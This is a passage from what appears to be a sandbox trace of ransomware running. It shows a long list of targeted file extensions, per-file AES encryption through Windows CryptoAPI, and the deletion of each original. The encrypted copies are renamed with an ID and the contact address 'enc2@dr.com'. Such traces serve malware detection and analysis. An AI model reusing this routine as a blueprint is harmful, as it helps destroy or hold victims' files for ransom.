.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.876] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.876] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.876] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.881] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x646f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x646f, lpOverlapped=0x0) returned 1
	[0191.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.884] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb880) returned 1
	[0191.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.886] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0191.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.886] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.887] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8eb0) returned 1
	[0191.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.887] CryptEncrypt (in: hKey=0xfb8eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x646f, dwBufLen=0x646f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x6470) returned 1
	[0191.888] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.888] RtlMoveMemory (in: Destination=0xfe35f8, Source=0xfdd180, Length=0x646f | out: Destination=0xfe35f8) 
	[0191.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.888] CryptEncrypt (in: hKey=0xfb8eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe35f8*, pdwDataLen=0x18a1ec*=0x646f, dwBufLen=0x6470 | out: pbData=0xfe35f8*, pdwDataLen=0x18a1ec*=0x6470) returned 1
	[0191.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.890] CryptDestroyKey (hKey=0xfb8eb0) returned 1
	[0191.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.891] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0191.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.891] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0191.891] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.891] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.892] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0191.895] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 102
	[0191.895] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0191.896] WriteFile (in: hFile=0x390, lpBuffer=0xfe35f8*, nNumberOfBytesToWrite=0x6470, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe35f8*, lpNumberOfBytesWritten=0x18a648*=0x6470, lpOverlapped=0x0) returned 1
	[0191.899] CloseHandle (hObject=0x390) returned 1
	[0191.900] CloseHandle (hObject=0x388) returned 1
	[0191.900] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a")) returned 1
	[0191.907] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a")) returned 0
	[0191.908] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380f9f0, ftCreationTime.dwHighDateTime=0x1d96e7a, ftLastAccessTime.dwLowDateTime=0x1bec7bc0, ftLastAccessTime.dwHighDateTime=0x1d97147, ftLastWriteTime.dwLowDateTime=0x1bec7bc0, ftLastWriteTime.dwHighDateTime=0x1d97147, nFileSizeHigh=0x0, nFileSizeLow=0x69e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X0bRndlbB4dBqtczopAo.mp3", cAlternateFileName="X0BRND~1.MP3")) returned 1
	[0191.908] lstrcmpW (lpString1="X0bRndlbB4dBqtczopAo.mp3", lpString2="..") returned 1
	[0191.908] lstrcmpW (lpString1="X0bRndlbB4dBqtczopAo.mp3", lpString2=".") returned 1
	[0191.908] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.908] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\", lpString2="X0bRndlbB4dBqtczopAo.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\X0bRndlbB4dBqtczopAo.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\X0bRndlbB4dBqtczopAo.mp3"
	[0192.288] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\X0bRndlbB4dBqtczopAo.mp3") returned 75
	[0192.288] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.288] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\X0bRndlbB4dBqtczopAo.mp3", cchLength=0x4b | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3") returned 0x4b
	[0192.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.289] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.289] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3"
	[0192.289] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3") returned 75
	[0192.289] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.289] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0192.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.290] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.290] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.290] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.290] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.294] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x69e0, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x69e0, lpOverlapped=0x0) returned 1
	[0192.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.297] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb770) returned 1
	[0192.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.300] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0192.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.301] CryptHashData (hHash=0xfb90b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.301] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb90b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9470) returned 1
	[0192.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.301] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x69e0, dwBufLen=0x69e0 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x69f0) returned 1
	[0192.302] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.302] RtlMoveMemory (in: Destination=0xfe3b68, Source=0xfdd180, Length=0x69e0 | out: Destination=0xfe3b68) 
	[0192.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.303] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe3b68*, pdwDataLen=0x18a1ec*=0x69e0, dwBufLen=0x69f0 | out: pbData=0xfe3b68*, pdwDataLen=0x18a1ec*=0x69f0) returned 1
	[0192.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.305] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0192.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.305] CryptDestroyHash (hHash=0xfb90b0) returned 1
	[0192.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.305] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0192.306] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.306] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.307] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0192.308] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 117
	[0192.308] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0192.309] WriteFile (in: hFile=0x390, lpBuffer=0xfe3b68*, nNumberOfBytesToWrite=0x69f0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe3b68*, lpNumberOfBytesWritten=0x18a648*=0x69f0, lpOverlapped=0x0) returned 1
	[0192.313] CloseHandle (hObject=0x390) returned 1
	[0192.313] CloseHandle (hObject=0x388) returned 1
	[0192.313] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3")) returned 1
	[0192.322] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\x0brndlbb4dbqtczopao.mp3")) returned 0
	[0192.322] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380f9f0, ftCreationTime.dwHighDateTime=0x1d96e7a, ftLastAccessTime.dwLowDateTime=0x1bec7bc0, ftLastAccessTime.dwHighDateTime=0x1d97147, ftLastWriteTime.dwLowDateTime=0x1bec7bc0, ftLastWriteTime.dwHighDateTime=0x1d97147, nFileSizeHigh=0x0, nFileSizeLow=0x69e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X0bRndlbB4dBqtczopAo.mp3", cAlternateFileName="X0BRND~1.MP3")) returned 0
	[0192.322] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0192.322] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0192.323] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE"
	[0192.323] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*"
	[0192.323] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.323] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
